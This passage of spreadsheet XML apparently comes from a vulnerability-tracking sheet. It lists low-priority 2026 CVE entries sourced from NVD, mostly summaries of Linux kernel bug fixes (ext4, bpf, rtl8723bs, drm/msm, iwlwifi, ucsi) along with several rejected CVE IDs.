Free both owned dynamic databases in the unwind, mirroring
hsr_dellink(). proxy_node_db is provably empty on every current error
exit (only interlink RX feeds it, and the interlink add is the last
failable step) and is freed for symmetry. The order is safe:
hsr_del_port() unregisters each RX handler with synchronize_net()
before hsr_del_nodes() runs, which removes remaining entries with
list_del_rcu() and defers their release with call_rcu() for readers
already under RCU.</t>
        </is>
      </c>
      <c r="T438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100071</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100072</t>
        </is>
      </c>
      <c r="D439" s="5" t="inlineStr"/>
      <c r="E439" s="5" t="inlineStr"/>
      <c r="F439" s="5" t="inlineStr"/>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="inlineStr"/>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q439" s="5" t="inlineStr"/>
      <c r="R439" s="5" t="inlineStr"/>
      <c r="S439" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: platform: Use acpi_bus_get_primary_device()
The acpi_get_first_physical_node() usage in acpi_platform_fill_resource()
and acpi_create_platform_device() is generally unsafe because in theory
the device returned by it may be freed at any time [1].
It is also inefficient because acpi_get_first_physical_node() is called
multiple times for the same argument which can be avoided.
Address these issues by using acpi_bus_get_primary_device() instead of
acpi_get_first_physical_node() and adjusting the code to call it just
once at the beginning of and acpi_create_platform_device() and drop
the device reference acquired by it upon the return from that function.</t>
        </is>
      </c>
      <c r="T439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100072</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100073</t>
        </is>
      </c>
      <c r="D440" s="5" t="inlineStr"/>
      <c r="E440" s="5" t="inlineStr"/>
      <c r="F440" s="5" t="inlineStr"/>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="inlineStr"/>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr"/>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q440" s="5" t="inlineStr"/>
      <c r="R440" s="5" t="inlineStr"/>
      <c r="S440" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: fix transaction overflow during writeback
Commit 95ad8ee45cdb ("ext4: correct the reserved credits for extent
conversion") was correct to note that we need to reserve enough credits
for all extents possibly underlying a large folio. However it was too
eager to reduce the number of reserved credits. Extent conversion may
not only need to touch several leaf extent blocks, it may also need to
split extents - for example a single large unwritten extent may need to
be split into many small written ones in case of sparse folio dirtying.
This can thus result not only in extent leaf modifications but also in a
need to allocate new extent tree nodes. As a result the reserved
transaction credits were not sufficient in some corner cases. Use
ext4_meta_trans_blocks() for correct upper bound credit estimate.</t>
        </is>
      </c>
      <c r="T440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100073</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100074</t>
        </is>
      </c>
      <c r="D441" s="5" t="inlineStr"/>
      <c r="E441" s="5" t="inlineStr"/>
      <c r="F441" s="5" t="inlineStr"/>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="inlineStr"/>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr"/>
      <c r="K441" s="5" t="inlineStr"/>
      <c r="L441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q441" s="5" t="inlineStr"/>
      <c r="R441" s="5" t="inlineStr"/>
      <c r="S441" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark bpf_refcount field as unique
BPF_REFCOUNT is not marked as a unique field, while it should be. Fix
this oversight.</t>
        </is>
      </c>
      <c r="T441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100074</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100076</t>
        </is>
      </c>
      <c r="D442" s="5" t="inlineStr"/>
      <c r="E442" s="5" t="inlineStr"/>
      <c r="F442" s="5" t="inlineStr"/>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="inlineStr"/>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q442" s="5" t="inlineStr"/>
      <c r="R442" s="5" t="inlineStr"/>
      <c r="S442" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: rtl8723bs: fix xmit_frame/xmit_buf leaks on mgnt-frame error paths
issue_beacon(), issue_probersp() and issue_asocrsp() obtain a management
xmit_frame together with its xmit_buf from the driver's fixed-size
management-TX pools via alloc_mgtxmitframe(). On the normal path the frame
is handed to dump_mgntframe(), which transfers ownership and eventually
returns both objects to their pools (the frame and, for beacons, the buf
in rtl8723bs_mgnt_xmit(); other bufs via the pending-xmitbuf/TX-completion
path).
Several error/edge paths return early after a successful
alloc_mgtxmitframe() but before dump_mgntframe(), so ownership is never
transferred and neither object is freed:
  - issue_beacon(): beacon larger than 512 bytes
  - issue_probersp(): cur_network-&gt;ie_length &gt; MAX_IE_SZ
  - issue_probersp(): kzalloc() of the SSID scratch buffer fails
  - issue_asocrsp(): pkt_type is neither ASSOCRSP nor REASSOCRSP
Because alloc_mgtxmitframe() removes the frame and buf from their free
lists (list_del_init) without placing them on any pending list, an
orphaned pair is on no list and referenced by nobody, so it is only
reclaimed at driver teardown. Repeated hits progressively exhaust the
management-TX pools until alloc_mgtxmitframe() returns NULL and the
interface can no longer send beacons or probe/assoc responses.
Free the frame and buffer on these paths, matching the existing correct
error handling in issue_assocreq().</t>
        </is>
      </c>
      <c r="T442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100076</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100077</t>
        </is>
      </c>
      <c r="D443" s="5" t="inlineStr"/>
      <c r="E443" s="5" t="inlineStr"/>
      <c r="F443" s="5" t="inlineStr"/>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="inlineStr"/>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr"/>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q443" s="5" t="inlineStr"/>
      <c r="R443" s="5" t="inlineStr"/>
      <c r="S443" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/msm: Recover HW before retire hung submit
During recovery, it is not safe to retire the hung submit before we
recover the GPU. Retiring the submit triggers BO free and that can
result in GPU pagefaults since the GPU may be actively accessing those
BOs.
To fix this, retire the submits after gpu recovery is complete in
recover_worker().
Patchwork: https://patchwork.freedesktop.org/patch/730655/</t>
        </is>
      </c>
      <c r="T443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100077</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100078</t>
        </is>
      </c>
      <c r="D444" s="5" t="inlineStr"/>
      <c r="E444" s="5" t="inlineStr"/>
      <c r="F444" s="5" t="inlineStr"/>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="inlineStr"/>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr"/>
      <c r="K444" s="5" t="inlineStr"/>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q444" s="5" t="inlineStr"/>
      <c r="R444" s="5" t="inlineStr"/>
      <c r="S444" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: iwlwifi: mei: pass correct argument to function
The first argument to iwl_mei_write_cyclic_buf() should be the cldev
but the q_head pointer is passed instead. Fix it.</t>
        </is>
      </c>
      <c r="T444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100078</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100079</t>
        </is>
      </c>
      <c r="D445" s="5" t="inlineStr"/>
      <c r="E445" s="5" t="inlineStr"/>
      <c r="F445" s="5" t="inlineStr"/>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="inlineStr"/>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr"/>
      <c r="K445" s="5" t="inlineStr"/>
      <c r="L445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q445" s="5" t="inlineStr"/>
      <c r="R445" s="5" t="inlineStr"/>
      <c r="S445" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: typec: ucsi: unregister debugfs entries on teardown
ucsi_register() creates per-instance debugfs entries, but
ucsi_unregister() keeps them around until ucsi_destroy().
Drivers like ucsi_glink that unregister/register the same UCSI
instance across remoteproc restart then try to create an already
existing debugfs directory and log:
  debugfs: 'pmic_glink.ucsi.0' already exists in 'ucsi'
Unregister debugfs entries as part of ucsi_unregister(), and
clear ucsi-&gt;debugfs after freeing it so repeated unregister
paths remain safe.</t>
        </is>
      </c>
      <c r="T445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100079</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45234</t>
        </is>
      </c>
      <c r="D446" s="5" t="inlineStr"/>
      <c r="E446" s="5" t="inlineStr"/>
      <c r="F446" s="5" t="inlineStr"/>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="inlineStr"/>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr"/>
      <c r="L446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q446" s="5" t="inlineStr"/>
      <c r="R446" s="5" t="inlineStr"/>
      <c r="S446" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45234</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45235</t>
        </is>
      </c>
      <c r="D447" s="5" t="inlineStr"/>
      <c r="E447" s="5" t="inlineStr"/>
      <c r="F447" s="5" t="inlineStr"/>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="inlineStr"/>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q447" s="5" t="inlineStr"/>
      <c r="R447" s="5" t="inlineStr"/>
      <c r="S447" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45235</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45236</t>
        </is>
      </c>
      <c r="D448" s="5" t="inlineStr"/>
      <c r="E448" s="5" t="inlineStr"/>
      <c r="F448" s="5" t="inlineStr"/>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="inlineStr"/>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q448" s="5" t="inlineStr"/>
      <c r="R448" s="5" t="inlineStr"/>
      <c r="S448" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45236</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45237</t>
        </is>
      </c>
      <c r="D449" s="5" t="inlineStr"/>
      <c r="E449" s="5" t="inlineStr"/>
      <c r="F449" s="5" t="inlineStr"/>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="inlineStr"/>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr"/>
      <c r="K449" s="5" t="inlineStr"/>
      <c r="L449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q449" s="5" t="inlineStr"/>
      <c r="R449" s="5" t="inlineStr"/>
      <c r="S449" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45237</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45238</t>
        </is>
      </c>
      <c r="D450" s="5" t="inlineStr"/>
      <c r="E450" s="5" t="inlineStr"/>
      <c r="F450" s="5" t="inlineStr"/>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="inlineStr"/>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q450" s="5" t="inlineStr"/>
      <c r="R450" s="5" t="inlineStr"/>
      <c r="S450" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45238</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45239</t>
        </is>
      </c>
      <c r="D451" s="5" t="inlineStr"/>
      <c r="E451" s="5" t="inlineStr"/>
      <c r="F451" s="5" t="inlineStr"/>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="inlineStr"/>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr"/>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q451" s="5" t="inlineStr"/>
      <c r="R451" s="5" t="inlineStr"/>
      <c r="S451" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45239</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45240</t>
        </is>
      </c>
      <c r="D452" s="5" t="inlineStr"/>
      <c r="E452" s="5" t="inlineStr"/>
      <c r="F452" s="5" t="inlineStr"/>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="inlineStr"/>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr"/>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q452" s="5" t="inlineStr"/>
      <c r="R452" s="5" t="inlineStr"/>
      <c r="S452" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45240</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45241</t>
        </is>
      </c>
      <c r="D453" s="5" t="inlineStr"/>
      <c r="E453" s="5" t="inlineStr"/>
      <c r="F453" s="5" t="inlineStr"/>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="inlineStr"/>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr"/>
      <c r="L453" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q453" s="5" t="inlineStr"/>
      <c r="R453" s="5" t="inlineStr"/>
      <c r="S453" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45241</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49117</t>
        </is>
      </c>
      <c r="D454" s="5" t="inlineStr"/>
      <c r="E454" s="5" t="inlineStr"/>
      <c r="F454" s="5" t="inlineStr"/>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="inlineStr"/>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr"/>
      <c r="K454" s="5" t="inlineStr"/>
      <c r="L454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q454" s="5" t="inlineStr"/>
      <c r="R454" s="5" t="inlineStr"/>
      <c r="S454" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49117</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49118</t>
        </is>
      </c>
      <c r="D455" s="5" t="inlineStr"/>
      <c r="E455" s="5" t="inlineStr"/>
      <c r="F455" s="5" t="inlineStr"/>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="inlineStr"/>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr"/>
      <c r="K455" s="5" t="inlineStr"/>
      <c r="L455" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q455" s="5" t="inlineStr"/>
      <c r="R455" s="5" t="inlineStr"/>
      <c r="S455" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49118</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51772</t>
        </is>
      </c>
      <c r="D456" s="5" t="inlineStr"/>
      <c r="E456" s="5" t="inlineStr"/>
      <c r="F456" s="5" t="inlineStr"/>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="inlineStr"/>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr"/>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q456" s="5" t="inlineStr"/>
